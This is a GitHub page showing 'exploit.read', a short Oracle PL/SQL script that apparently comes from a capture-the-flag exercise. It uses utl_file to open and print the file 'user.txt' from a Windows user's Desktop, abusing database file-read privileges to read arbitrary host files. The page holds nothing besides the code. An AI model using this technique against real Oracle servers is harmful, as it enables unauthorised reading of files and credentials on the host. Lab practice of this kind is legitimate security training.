-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathexploit.read
More file actions
11 lines (10 loc) · 1005 Bytes
/
exploit.read
File metadata and controls
11 lines (10 loc) · 1005 Bytes
1
2
3
4
5
6
7
8
9
10
11
declare
f utl_file.file_type;
s varchar(400);
begin
f := utl_file.fopen('/inetpub/wwwroot', 'Users\Phineas\Desktop\user.txt','R');
utl_file.get_line(f,s);
utl_file.fclose(f);
dbms_output.put_line(s);
end;
set serveroutput ON;